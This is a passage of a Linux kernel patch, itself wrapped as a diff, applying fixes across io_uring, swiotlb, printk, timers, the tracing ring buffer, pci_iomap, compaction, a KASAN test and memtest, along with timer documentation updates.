+index 0d4ee3d738fbf..b1b564c04d1e7 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -876,7 +876,8 @@ int io_recvmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 			kfree(kmsg->free_iov);
+ 		io_netmsg_recycle(req, issue_flags);
+ 		req->flags &= ~REQ_F_NEED_CLEANUP;
+-	}
++	} else if (ret == -EAGAIN)
++		return io_setup_async_msg(req, kmsg, issue_flags);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bounds.c b/kernel/bounds.c
+index b529182e8b04f..c5a9fcd2d6228 100644
+--- a/kernel/bounds.c
++++ b/kernel/bounds.c
+@@ -19,7 +19,7 @@ int main(void)
+ 	DEFINE(NR_PAGEFLAGS, __NR_PAGEFLAGS);
+ 	DEFINE(MAX_NR_ZONES, __MAX_NR_ZONES);
+ #ifdef CONFIG_SMP
+-	DEFINE(NR_CPUS_BITS, ilog2(CONFIG_NR_CPUS));
++	DEFINE(NR_CPUS_BITS, bits_per(CONFIG_NR_CPUS));
+ #endif
+ 	DEFINE(SPINLOCK_SIZE, sizeof(spinlock_t));
+ #ifdef CONFIG_LRU_GEN
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index ad6333c3fe1ff..db89ac94e7db4 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -654,8 +654,7 @@ static int swiotlb_do_find_slots(struct device *dev, int area_index,
+ 	dma_addr_t tbl_dma_addr =
+ 		phys_to_dma_unencrypted(dev, mem->start) & boundary_mask;
+ 	unsigned long max_slots = get_max_slots(boundary_mask);
+-	unsigned int iotlb_align_mask =
+-		dma_get_min_align_mask(dev) & ~(IO_TLB_SIZE - 1);
++	unsigned int iotlb_align_mask = dma_get_min_align_mask(dev);
+ 	unsigned int nslots = nr_slots(alloc_size), stride;
+ 	unsigned int index, wrap, count = 0, i;
+ 	unsigned int offset = swiotlb_align_offset(dev, orig_addr);
+@@ -666,6 +665,14 @@ static int swiotlb_do_find_slots(struct device *dev, int area_index,
+ 	BUG_ON(!nslots);
+ 	BUG_ON(area_index >= mem->nareas);
+ 
++	/*
++	 * Ensure that the allocation is at least slot-aligned and update
++	 * 'iotlb_align_mask' to ignore bits that will be preserved when
++	 * offsetting into the allocation.
++	 */
++	alloc_align_mask |= (IO_TLB_SIZE - 1);
++	iotlb_align_mask &= ~alloc_align_mask;
++
+ 	/*
+ 	 * For mappings with an alignment requirement don't bother looping to
+ 	 * unaligned slots once we found an aligned one.  For allocations of
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index be61332c66b54..ccf2b1e1b40be 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -77,8 +77,14 @@ static long syscall_trace_enter(struct pt_regs *regs, long syscall,
+ 	/* Either of the above might have changed the syscall number */
+ 	syscall = syscall_get_nr(current, regs);
+ 
+-	if (unlikely(work & SYSCALL_WORK_SYSCALL_TRACEPOINT))
++	if (unlikely(work & SYSCALL_WORK_SYSCALL_TRACEPOINT)) {
+ 		trace_sys_enter(regs, syscall);
++		/*
++		 * Probes or BPF hooks in the tracepoint may have changed the
++		 * system call number as well.
++		 */
++		syscall = syscall_get_nr(current, regs);
++	}
+ 
+ 	syscall_enter_audit(regs, syscall);
+ 
+diff --git a/kernel/power/suspend.c b/kernel/power/suspend.c
+index fa3bf161d13f7..a718067deecee 100644
+--- a/kernel/power/suspend.c
++++ b/kernel/power/suspend.c
+@@ -192,6 +192,7 @@ static int __init mem_sleep_default_setup(char *str)
+ 		if (mem_sleep_labels[state] &&
+ 		    !strcmp(str, mem_sleep_labels[state])) {
+ 			mem_sleep_default = state;
++			mem_sleep_current = state;
+ 			break;
+ 		}
+ 
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index 981cdb00b8722..0ae06d5046bb0 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -1947,6 +1947,12 @@ static int console_trylock_spinning(void)
+ 	 */
+ 	mutex_acquire(&console_lock_dep_map, 0, 1, _THIS_IP_);
+ 
++	/*
++	 * Update @console_may_schedule for trylock because the previous
++	 * owner may have been schedulable.
++	 */
++	console_may_schedule = 0;
++
+ 	return 1;
+ }
+ 
+@@ -3045,6 +3051,21 @@ static int __init keep_bootcon_setup(char *str)
+ 
+ early_param("keep_bootcon", keep_bootcon_setup);
+ 
++static int console_call_setup(struct console *newcon, char *options)
++{
++	int err;
++
++	if (!newcon->setup)
++		return 0;
++
++	/* Synchronize with possible boot console. */
++	console_lock();
++	err = newcon->setup(newcon, options);
++	console_unlock();
++
++	return err;
++}
++
+ /*
+  * This is called by register_console() to try to match
+  * the newly registered console with any of the ones selected
+@@ -3080,8 +3101,8 @@ static int try_enable_preferred_console(struct console *newcon,
+ 			if (_braille_register_console(newcon, c))
+ 				return 0;
+ 
+-			if (newcon->setup &&
+-			    (err = newcon->setup(newcon, c->options)) != 0)
++			err = console_call_setup(newcon, c->options);
++			if (err)
+ 				return err;
+ 		}
+ 		newcon->flags |= CON_ENABLED;
+@@ -3107,7 +3128,7 @@ static void try_enable_default_console(struct console *newcon)
+ 	if (newcon->index < 0)
+ 		newcon->index = 0;
+ 
+-	if (newcon->setup && newcon->setup(newcon, NULL) != 0)
++	if (console_call_setup(newcon, NULL) != 0)
+ 		return;
+ 
+ 	newcon->flags |= CON_ENABLED;
+diff --git a/kernel/time/timer.c b/kernel/time/timer.c
+index 717fcb9fb14aa..59469897432bc 100644
+--- a/kernel/time/timer.c
++++ b/kernel/time/timer.c
+@@ -1083,7 +1083,7 @@ __mod_timer(struct timer_list *timer, unsigned long expires, unsigned int option
+ 		/*
+ 		 * We are trying to schedule the timer on the new base.
+ 		 * However we can't change timer's base while it is running,
+-		 * otherwise del_timer_sync() can't detect that the timer's
++		 * otherwise timer_delete_sync() can't detect that the timer's
+ 		 * handler yet has not finished. This also guarantees that the
+ 		 * timer is serialized wrt itself.
+ 		 */
+@@ -1121,14 +1121,16 @@ __mod_timer(struct timer_list *timer, unsigned long expires, unsigned int option
+ }
+ 
+ /**
+- * mod_timer_pending - modify a pending timer's timeout
+- * @timer: the pending timer to be modified
+- * @expires: new timeout in jiffies
++ * mod_timer_pending - Modify a pending timer's timeout
++ * @timer:	The pending timer to be modified
++ * @expires:	New absolute timeout in jiffies
+  *
+- * mod_timer_pending() is the same for pending timers as mod_timer(),
+- * but will not re-activate and modify already deleted timers.
++ * mod_timer_pending() is the same for pending timers as mod_timer(), but
++ * will not activate inactive timers.
+  *
+- * It is useful for unserialized use of timers.
++ * Return:
++ * * %0 - The timer was inactive and not modified
++ * * %1 - The timer was active and requeued to expire at @expires
+  */
+ int mod_timer_pending(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1137,24 +1139,27 @@ int mod_timer_pending(struct timer_list *timer, unsigned long expires)
+ EXPORT_SYMBOL(mod_timer_pending);
+ 
+ /**
+- * mod_timer - modify a timer's timeout
+- * @timer: the timer to be modified
+- * @expires: new timeout in jiffies
+- *
+- * mod_timer() is a more efficient way to update the expire field of an
+- * active timer (if the timer is inactive it will be activated)
++ * mod_timer - Modify a timer's timeout
++ * @timer:	The timer to be modified
++ * @expires:	New absolute timeout in jiffies
+  *
+  * mod_timer(timer, expires) is equivalent to:
+  *
+  *     del_timer(timer); timer->expires = expires; add_timer(timer);
+  *
++ * mod_timer() is more efficient than the above open coded sequence. In
++ * case that the timer is inactive, the del_timer() part is a NOP. The
++ * timer is in any case activated with the new expiry time @expires.
++ *
+  * Note that if there are multiple unserialized concurrent users of the
+  * same timer, then mod_timer() is the only safe way to modify the timeout,
+  * since add_timer() cannot modify an already running timer.
+  *
+- * The function returns whether it has modified a pending timer or not.
+- * (ie. mod_timer() of an inactive timer returns 0, mod_timer() of an
+- * active timer returns 1.)
++ * Return:
++ * * %0 - The timer was inactive and started
++ * * %1 - The timer was active and requeued to expire at @expires or
++ *	  the timer was active and not modified because @expires did
++ *	  not change the effective expiry time
+  */
+ int mod_timer(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1165,11 +1170,18 @@ EXPORT_SYMBOL(mod_timer);
+ /**
+  * timer_reduce - Modify a timer's timeout if it would reduce the timeout
+  * @timer:	The timer to be modified
+- * @expires:	New timeout in jiffies
++ * @expires:	New absolute timeout in jiffies
+  *
+  * timer_reduce() is very similar to mod_timer(), except that it will only
+- * modify a running timer if that would reduce the expiration time (it will
+- * start a timer that isn't running).
++ * modify an enqueued timer if that would reduce the expiration time. If
++ * @timer is not enqueued it starts the timer.
++ *
++ * Return:
++ * * %0 - The timer was inactive and started
++ * * %1 - The timer was active and requeued to expire at @expires or
++ *	  the timer was active and not modified because @expires
++ *	  did not change the effective expiry time such that the
++ *	  timer would expire earlier than already scheduled
+  */
+ int timer_reduce(struct timer_list *timer, unsigned long expires)
+ {
+@@ -1178,18 +1190,21 @@ int timer_reduce(struct timer_list *timer, unsigned long expires)
+ EXPORT_SYMBOL(timer_reduce);
+ 
+ /**
+- * add_timer - start a timer
+- * @timer: the timer to be added
++ * add_timer - Start a timer
++ * @timer:	The timer to be started
+  *
+- * The kernel will do a ->function(@timer) callback from the
+- * timer interrupt at the ->expires point in the future. The
+- * current time is 'jiffies'.
++ * Start @timer to expire at @timer->expires in the future. @timer->expires
++ * is the absolute expiry time measured in 'jiffies'. When the timer expires
++ * timer->function(timer) will be invoked from soft interrupt context.
+  *
+- * The timer's ->expires, ->function fields must be set prior calling this
+- * function.
++ * The @timer->expires and @timer->function fields must be set prior
++ * to calling this function.
+  *
+- * Timers with an ->expires field in the past will be executed in the next
+- * timer tick.
++ * If @timer->expires is already in the past @timer will be queued to
++ * expire at the next timer tick.
++ *
++ * This can only operate on an inactive timer. Attempts to invoke this on
++ * an active timer are rejected with a warning.
+  */
+ void add_timer(struct timer_list *timer)
+ {
+@@ -1199,11 +1214,13 @@ void add_timer(struct timer_list *timer)
+ EXPORT_SYMBOL(add_timer);
+ 
+ /**
+- * add_timer_on - start a timer on a particular CPU
+- * @timer: the timer to be added
+- * @cpu: the CPU to start it on
++ * add_timer_on - Start a timer on a particular CPU
++ * @timer:	The timer to be started
++ * @cpu:	The CPU to start it on
++ *
++ * Same as add_timer() except that it starts the timer on the given CPU.
+  *
+- * This is not very scalable on SMP. Double adds are not possible.
++ * See add_timer() for further details.
+  */
+ void add_timer_on(struct timer_list *timer, int cpu)
+ {
+@@ -1238,15 +1255,18 @@ void add_timer_on(struct timer_list *timer, int cpu)
+ EXPORT_SYMBOL_GPL(add_timer_on);
+ 
+ /**
+- * del_timer - deactivate a timer.
+- * @timer: the timer to be deactivated
+- *
+- * del_timer() deactivates a timer - this works on both active and inactive
+- * timers.
+- *
+- * The function returns whether it has deactivated a pending timer or not.
+- * (ie. del_timer() of an inactive timer returns 0, del_timer() of an
+- * active timer returns 1.)
++ * del_timer - Deactivate a timer.
++ * @timer:	The timer to be deactivated
++ *
++ * The function only deactivates a pending timer, but contrary to
++ * timer_delete_sync() it does not take into account whether the timer's
++ * callback function is concurrently executed on a different CPU or not.
++ * It neither prevents rearming of the timer. If @timer can be rearmed
++ * concurrently then the return value of this function is meaningless.
++ *
++ * Return:
++ * * %0 - The timer was not pending
++ * * %1 - The timer was pending and deactivated
+  */
+ int del_timer(struct timer_list *timer)
+ {
+@@ -1268,10 +1288,19 @@ EXPORT_SYMBOL(del_timer);
+ 
+ /**
+  * try_to_del_timer_sync - Try to deactivate a timer
+- * @timer: timer to delete
++ * @timer:	Timer to deactivate
++ *
++ * This function tries to deactivate a timer. On success the timer is not
++ * queued and the timer callback function is not running on any CPU.
++ *
++ * This function does not guarantee that the timer cannot be rearmed right
++ * after dropping the base lock. That needs to be prevented by the calling
++ * code if necessary.
+  *
+- * This function tries to deactivate a timer. Upon successful (ret >= 0)
+- * exit the timer is not queued and the handler is not running on any CPU.
++ * Return:
++ * * %0  - The timer was not pending
++ * * %1  - The timer was pending and deactivated
++ * * %-1 - The timer callback function is running on a different CPU
+  */
+ int try_to_del_timer_sync(struct timer_list *timer)
+ {
+@@ -1365,25 +1394,20 @@ static inline void timer_sync_wait_running(struct timer_base *base) { }
+ static inline void del_timer_wait_running(struct timer_list *timer) { }
+ #endif
+ 
+-#if defined(CONFIG_SMP) || defined(CONFIG_PREEMPT_RT)
+ /**
+- * del_timer_sync - deactivate a timer and wait for the handler to finish.
+- * @timer: the timer to be deactivated
+- *
+- * This function only differs from del_timer() on SMP: besides deactivating
+- * the timer it also makes sure the handler has finished executing on other
+- * CPUs.
++ * timer_delete_sync - Deactivate a timer and wait for the handler to finish.
++ * @timer:	The timer to be deactivated
+  *
+  * Synchronization rules: Callers must prevent restarting of the timer,
+  * otherwise this function is meaningless. It must not be called from
+  * interrupt contexts unless the timer is an irqsafe one. The caller must
+- * not hold locks which would prevent completion of the timer's
+- * handler. The timer's handler must not call add_timer_on(). Upon exit the
+- * timer is not queued and the handler is not running on any CPU.
++ * not hold locks which would prevent completion of the timer's callback
++ * function. The timer's handler must not call add_timer_on(). Upon exit
++ * the timer is not queued and the handler is not running on any CPU.
+  *
+- * Note: For !irqsafe timers, you must not hold locks that are held in
+- *   interrupt context while calling this function. Even if the lock has
+- *   nothing to do with the timer in question.  Here's why::
++ * For !irqsafe timers, the caller must not hold locks that are held in
++ * interrupt context. Even if the lock has nothing to do with the timer in
++ * question.  Here's why::
+  *
+  *    CPU0                             CPU1
+  *    ----                             ----
+@@ -1393,16 +1417,23 @@ static inline void del_timer_wait_running(struct timer_list *timer) { }
+  *    spin_lock_irq(somelock);
+  *                                     <IRQ>
+  *                                        spin_lock(somelock);
+- *    del_timer_sync(mytimer);
++ *    timer_delete_sync(mytimer);
+  *    while (base->running_timer == mytimer);
+  *
+- * Now del_timer_sync() will never return and never release somelock.
+- * The interrupt on the other CPU is waiting to grab somelock but
+- * it has interrupted the softirq that CPU0 is waiting to finish.
++ * Now timer_delete_sync() will never return and never release somelock.
++ * The interrupt on the other CPU is waiting to grab somelock but it has
++ * interrupted the softirq that CPU0 is waiting to finish.
++ *
++ * This function cannot guarantee that the timer is not rearmed again by
++ * some concurrent or preempting code, right after it dropped the base
++ * lock. If there is the possibility of a concurrent rearm then the return
++ * value of the function is meaningless.
+  *
+- * The function returns whether it has deactivated a pending timer or not.
++ * Return:
++ * * %0	- The timer was not pending
++ * * %1	- The timer was pending and deactivated
+  */
+-int del_timer_sync(struct timer_list *timer)
++int timer_delete_sync(struct timer_list *timer)
+ {
+ 	int ret;
+ 
+@@ -1442,8 +1473,7 @@ int del_timer_sync(struct timer_list *timer)
+ 
+ 	return ret;
+ }
+-EXPORT_SYMBOL(del_timer_sync);
+-#endif
++EXPORT_SYMBOL(timer_delete_sync);
+ 
+ static void call_timer_fn(struct timer_list *timer,
+ 			  void (*fn)(struct timer_list *),
+@@ -1465,8 +1495,8 @@ static void call_timer_fn(struct timer_list *timer,
+ #endif
+ 	/*
+ 	 * Couple the lock chain with the lock chain at
+-	 * del_timer_sync() by acquiring the lock_map around the fn()
+-	 * call here and in del_timer_sync().
++	 * timer_delete_sync() by acquiring the lock_map around the fn()
++	 * call here and in timer_delete_sync().
+ 	 */
+ 	lock_map_acquire(&lockdep_map);
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index e019a9278794f..431a922e5c89e 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -414,7 +414,6 @@ struct rb_irq_work {
+ 	struct irq_work			work;
+ 	wait_queue_head_t		waiters;
+ 	wait_queue_head_t		full_waiters;
+-	long				wait_index;
+ 	bool				waiters_pending;
+ 	bool				full_waiters_pending;
+ 	bool				wakeup_full;
+@@ -908,8 +907,19 @@ static void rb_wake_up_waiters(struct irq_work *work)
+ 
+ 	wake_up_all(&rbwork->waiters);
+ 	if (rbwork->full_waiters_pending || rbwork->wakeup_full) {
++		/* Only cpu_buffer sets the above flags */
++		struct ring_buffer_per_cpu *cpu_buffer =
++			container_of(rbwork, struct ring_buffer_per_cpu, irq_work);
++
++		/* Called from interrupt context */
++		raw_spin_lock(&cpu_buffer->reader_lock);
+ 		rbwork->wakeup_full = false;
+ 		rbwork->full_waiters_pending = false;
++
++		/* Waking up all waiters, they will reset the shortest full */
++		cpu_buffer->shortest_full = 0;
++		raw_spin_unlock(&cpu_buffer->reader_lock);
++
+ 		wake_up_all(&rbwork->full_waiters);
+ 	}
+ }
+@@ -949,14 +959,95 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ 		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+-	rbwork->wait_index++;
+-	/* make sure the waiters see the new index */
+-	smp_wmb();
+-
+ 	/* This can be called in any context */
+ 	irq_work_queue(&rbwork->work);
+ }
+ 
++static bool rb_watermark_hit(struct trace_buffer *buffer, int cpu, int full)
++{
++	struct ring_buffer_per_cpu *cpu_buffer;
++	bool ret = false;
++
++	/* Reads of all CPUs always waits for any data */
++	if (cpu == RING_BUFFER_ALL_CPUS)
++		return !ring_buffer_empty(buffer);
++
++	cpu_buffer = buffer->buffers[cpu];
++
++	if (!ring_buffer_empty_cpu(buffer, cpu)) {
++		unsigned long flags;
++		bool pagebusy;
++
++		if (!full)
++			return true;
++
++		raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
++		pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
++		ret = !pagebusy && full_hit(buffer, cpu, full);
++
++		if (!ret && (!cpu_buffer->shortest_full ||
++			     cpu_buffer->shortest_full > full)) {
++		    cpu_buffer->shortest_full = full;
++		}
++		raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
++	}
++	return ret;
++}
++
++static inline bool
++rb_wait_cond(struct rb_irq_work *rbwork, struct trace_buffer *buffer,
++	     int cpu, int full, ring_buffer_cond_fn cond, void *data)
++{
++	if (rb_watermark_hit(buffer, cpu, full))
++		return true;
++
++	if (cond(data))
++		return true;
++
++	/*
++	 * The events can happen in critical sections where
++	 * checking a work queue can cause deadlocks.
++	 * After adding a task to the queue, this flag is set
++	 * only to notify events to try to wake up the queue
++	 * using irq_work.
++	 *
++	 * We don't clear it even if the buffer is no longer
++	 * empty. The flag only causes the next event to run
++	 * irq_work to do the work queue wake up. The worse
++	 * that can happen if we race with !trace_empty() is that
++	 * an event will cause an irq_work to try to wake up
++	 * an empty queue.
++	 *
++	 * There's no reason to protect this flag either, as
++	 * the work queue and irq_work logic will do the necessary
++	 * synchronization for the wake ups. The only thing
++	 * that is necessary is that the wake up happens after
++	 * a task has been queued. It's OK for spurious wake ups.
++	 */
++	if (full)
++		rbwork->full_waiters_pending = true;
++	else
++		rbwork->waiters_pending = true;
++
++	return false;
++}
++
++/*
++ * The default wait condition for ring_buffer_wait() is to just to exit the
++ * wait loop the first time it is woken up.
++ */
++static bool rb_wait_once(void *data)
++{
++	long *once = data;
++
++	/* wait_event() actually calls this twice before scheduling*/
++	if (*once > 1)
++		return true;
++
++	(*once)++;
++	return false;
++}
++
+ /**
+  * ring_buffer_wait - wait for input to the ring buffer
+  * @buffer: buffer to wait on
+@@ -970,101 +1061,39 @@ void ring_buffer_wake_waiters(struct trace_buffer *buffer, int cpu)
+ int ring_buffer_wait(struct trace_buffer *buffer, int cpu, int full)
+ {
+ 	struct ring_buffer_per_cpu *cpu_buffer;
+-	DEFINE_WAIT(wait);
+-	struct rb_irq_work *work;
+-	long wait_index;
++	struct wait_queue_head *waitq;
++	ring_buffer_cond_fn cond;
++	struct rb_irq_work *rbwork;
++	void *data;
++	long once = 0;
+ 	int ret = 0;
+ 
++	cond = rb_wait_once;
++	data = &once;
++
+ 	/*
+ 	 * Depending on what the caller is waiting for, either any
+ 	 * data in any cpu buffer, or a specific buffer, put the
+ 	 * caller on the appropriate wait queue.
+ 	 */
+ 	if (cpu == RING_BUFFER_ALL_CPUS) {
+-		work = &buffer->irq_work;
++		rbwork = &buffer->irq_work;
+ 		/* Full only makes sense on per cpu reads */
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+ 			return -ENODEV;
+ 		cpu_buffer = buffer->buffers[cpu];
+-		work = &cpu_buffer->irq_work;
+-	}
+-
+-	wait_index = READ_ONCE(work->wait_index);
+-
+-	while (true) {
+-		if (full)
+-			prepare_to_wait(&work->full_waiters, &wait, TASK_INTERRUPTIBLE);
+-		else
+-			prepare_to_wait(&work->waiters, &wait, TASK_INTERRUPTIBLE);
+-
+-		/*
+-		 * The events can happen in critical sections where
+-		 * checking a work queue can cause deadlocks.
+-		 * After adding a task to the queue, this flag is set
+-		 * only to notify events to try to wake up the queue
+-		 * using irq_work.
+-		 *
+-		 * We don't clear it even if the buffer is no longer
+-		 * empty. The flag only causes the next event to run
+-		 * irq_work to do the work queue wake up. The worse
+-		 * that can happen if we race with !trace_empty() is that
+-		 * an event will cause an irq_work to try to wake up
+-		 * an empty queue.
+-		 *
+-		 * There's no reason to protect this flag either, as
+-		 * the work queue and irq_work logic will do the necessary
+-		 * synchronization for the wake ups. The only thing
+-		 * that is necessary is that the wake up happens after
+-		 * a task has been queued. It's OK for spurious wake ups.
+-		 */
+-		if (full)
+-			work->full_waiters_pending = true;
+-		else
+-			work->waiters_pending = true;
+-
+-		if (signal_pending(current)) {
+-			ret = -EINTR;
+-			break;
+-		}
+-
+-		if (cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer))
+-			break;
+-
+-		if (cpu != RING_BUFFER_ALL_CPUS &&
+-		    !ring_buffer_empty_cpu(buffer, cpu)) {
+-			unsigned long flags;
+-			bool pagebusy;
+-			bool done;
+-
+-			if (!full)
+-				break;
+-
+-			raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+-			pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
+-			done = !pagebusy && full_hit(buffer, cpu, full);
+-
+-			if (!cpu_buffer->shortest_full ||
+-			    cpu_buffer->shortest_full > full)
+-				cpu_buffer->shortest_full = full;
+-			raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
+-			if (done)
+-				break;
+-		}
+-
+-		schedule();
+-
+-		/* Make sure to see the new wait index */
+-		smp_rmb();
+-		if (wait_index != work->wait_index)
+-			break;
++		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+ 	if (full)
+-		finish_wait(&work->full_waiters, &wait);
++		waitq = &rbwork->full_waiters;
+ 	else
+-		finish_wait(&work->waiters, &wait);
++		waitq = &rbwork->waiters;
++
++	ret = wait_event_interruptible((*waitq),
++				rb_wait_cond(rbwork, buffer, cpu, full, cond, data));
+ 
+ 	return ret;
+ }
+@@ -1088,30 +1117,51 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 			  struct file *filp, poll_table *poll_table, int full)
+ {
+ 	struct ring_buffer_per_cpu *cpu_buffer;
+-	struct rb_irq_work *work;
++	struct rb_irq_work *rbwork;
+ 
+ 	if (cpu == RING_BUFFER_ALL_CPUS) {
+-		work = &buffer->irq_work;
++		rbwork = &buffer->irq_work;
+ 		full = 0;
+ 	} else {
+ 		if (!cpumask_test_cpu(cpu, buffer->cpumask))
+ 			return EPOLLERR;
+ 
+ 		cpu_buffer = buffer->buffers[cpu];
+-		work = &cpu_buffer->irq_work;
++		rbwork = &cpu_buffer->irq_work;
+ 	}
+ 
+ 	if (full) {
+-		poll_wait(filp, &work->full_waiters, poll_table);
+-		work->full_waiters_pending = true;
++		unsigned long flags;
++
++		poll_wait(filp, &rbwork->full_waiters, poll_table);
++
++		raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
+ 		if (!cpu_buffer->shortest_full ||
+ 		    cpu_buffer->shortest_full > full)
+ 			cpu_buffer->shortest_full = full;
+-	} else {
+-		poll_wait(filp, &work->waiters, poll_table);
+-		work->waiters_pending = true;
++		raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
++		if (full_hit(buffer, cpu, full))
++			return EPOLLIN | EPOLLRDNORM;
++		/*
++		 * Only allow full_waiters_pending update to be seen after
++		 * the shortest_full is set. If the writer sees the
++		 * full_waiters_pending flag set, it will compare the
++		 * amount in the ring buffer to shortest_full. If the amount
++		 * in the ring buffer is greater than the shortest_full
++		 * percent, it will call the irq_work handler to wake up
++		 * this list. The irq_handler will reset shortest_full
++		 * back to zero. That's done under the reader_lock, but
++		 * the below smp_mb() makes sure that the update to
++		 * full_waiters_pending doesn't leak up into the above.
++		 */
++		smp_mb();
++		rbwork->full_waiters_pending = true;
++		return 0;
+ 	}
+ 
++	poll_wait(filp, &rbwork->waiters, poll_table);
++	rbwork->waiters_pending = true;
++
+ 	/*
+ 	 * There's a tight race between setting the waiters_pending and
+ 	 * checking if the ring buffer is empty.  Once the waiters_pending bit
+@@ -1127,9 +1177,6 @@ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 	 */
+ 	smp_mb();
+ 
+-	if (full)
+-		return full_hit(buffer, cpu, full) ? EPOLLIN | EPOLLRDNORM : 0;
+-
+ 	if ((cpu == RING_BUFFER_ALL_CPUS && !ring_buffer_empty(buffer)) ||
+ 	    (cpu != RING_BUFFER_ALL_CPUS && !ring_buffer_empty_cpu(buffer, cpu)))
+ 		return EPOLLIN | EPOLLRDNORM;
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f667d6bdddda5..f2b00ea38111a 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -8278,6 +8278,20 @@ tracing_buffers_read(struct file *filp, char __user *ubuf,
+ 	return size;
+ }
+ 
++static int tracing_buffers_flush(struct file *file, fl_owner_t id)
++{
++	struct ftrace_buffer_info *info = file->private_data;
++	struct trace_iterator *iter = &info->iter;
++
++	iter->wait_index++;
++	/* Make sure the waiters see the new wait_index */
++	smp_wmb();
++
++	ring_buffer_wake_waiters(iter->array_buffer->buffer, iter->cpu_file);
++
++	return 0;
++}
++
+ static int tracing_buffers_release(struct inode *inode, struct file *file)
+ {
+ 	struct ftrace_buffer_info *info = file->private_data;
+@@ -8289,12 +8303,6 @@ static int tracing_buffers_release(struct inode *inode, struct file *file)
+ 
+ 	__trace_array_put(iter->tr);
+ 
+-	iter->wait_index++;
+-	/* Make sure the waiters see the new wait_index */
+-	smp_wmb();
+-
+-	ring_buffer_wake_waiters(iter->array_buffer->buffer, iter->cpu_file);
+-
+ 	if (info->spare)
+ 		ring_buffer_free_read_page(iter->array_buffer->buffer,
+ 					   info->spare_cpu, info->spare);
+@@ -8508,6 +8516,7 @@ static const struct file_operations tracing_buffers_fops = {
+ 	.read		= tracing_buffers_read,
+ 	.poll		= tracing_buffers_poll,
+ 	.release	= tracing_buffers_release,
++	.flush		= tracing_buffers_flush,
+ 	.splice_read	= tracing_buffers_splice_read,
+ 	.unlocked_ioctl = tracing_buffers_ioctl,
+ 	.llseek		= no_llseek,
+diff --git a/lib/pci_iomap.c b/lib/pci_iomap.c
+index ce39ce9f3526e..2829ddb0e316b 100644
+--- a/lib/pci_iomap.c
++++ b/lib/pci_iomap.c
+@@ -170,8 +170,8 @@ void pci_iounmap(struct pci_dev *dev, void __iomem *p)
+ 
+ 	if (addr >= start && addr < start + IO_SPACE_LIMIT)
+ 		return;
+-	iounmap(p);
+ #endif
++	iounmap(p);
+ }
+ EXPORT_SYMBOL(pci_iounmap);
+ 
+diff --git a/mm/compaction.c b/mm/compaction.c
+index 8238e83385a79..23af5f3b2ccaf 100644
+--- a/mm/compaction.c
++++ b/mm/compaction.c
+@@ -2570,16 +2570,11 @@ enum compact_result try_to_compact_pages(gfp_t gfp_mask, unsigned int order,
+ 		unsigned int alloc_flags, const struct alloc_context *ac,
+ 		enum compact_priority prio, struct page **capture)
+ {
+-	int may_perform_io = (__force int)(gfp_mask & __GFP_IO);
+ 	struct zoneref *z;
+ 	struct zone *zone;
+ 	enum compact_result rc = COMPACT_SKIPPED;
+ 
+-	/*
+-	 * Check if the GFP flags allow compaction - GFP_NOIO is really
+-	 * tricky context because the migration might require IO
+-	 */
+-	if (!may_perform_io)
++	if (!gfp_compaction_allowed(gfp_mask))
+ 		return COMPACT_SKIPPED;
+ 
+ 	trace_mm_compaction_try_to_compact_pages(order, gfp_mask, prio);
+diff --git a/mm/kasan/kasan_test.c b/mm/kasan/kasan_test.c
+index 0d59098f08761..cef683a2e0d2e 100644
+--- a/mm/kasan/kasan_test.c
++++ b/mm/kasan/kasan_test.c
+@@ -415,7 +415,8 @@ static void kmalloc_oob_16(struct kunit *test)
+ 	/* This test is specifically crafted for the generic mode. */
+ 	KASAN_TEST_NEEDS_CONFIG_ON(test, CONFIG_KASAN_GENERIC);
+ 
+-	ptr1 = kmalloc(sizeof(*ptr1) - 3, GFP_KERNEL);
++	/* RELOC_HIDE to prevent gcc from warning about short alloc */
++	ptr1 = RELOC_HIDE(kmalloc(sizeof(*ptr1) - 3, GFP_KERNEL), 0);
+ 	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, ptr1);
+ 
+ 	ptr2 = kmalloc(sizeof(*ptr2), GFP_KERNEL);
+diff --git a/mm/memtest.c b/mm/memtest.c
+index f53ace709ccd8..d407373f225b4 100644
+--- a/mm/memtest.c
++++ b/mm/memtest.c
+@@ -46,10 +46,10 @@ static void __init memtest(u64 pattern, phys_addr_t start_phys, phys_addr_t size
+ 	last_bad = 0;
+ 
+ 	for (p = start; p < end; p++)
+-		*p = pattern;
++		WRITE_ONCE(*p, pattern);
+ 
+ 	for (p = start; p < end; p++, start_phys_aligned += incr) {
+-		if (*p == pattern)
++		if (READ_ONCE(*p) == pattern)
+ 			continue;
+ 		if (start_phys_aligned == last_bad + incr) {
+ 			last_bad += incr;
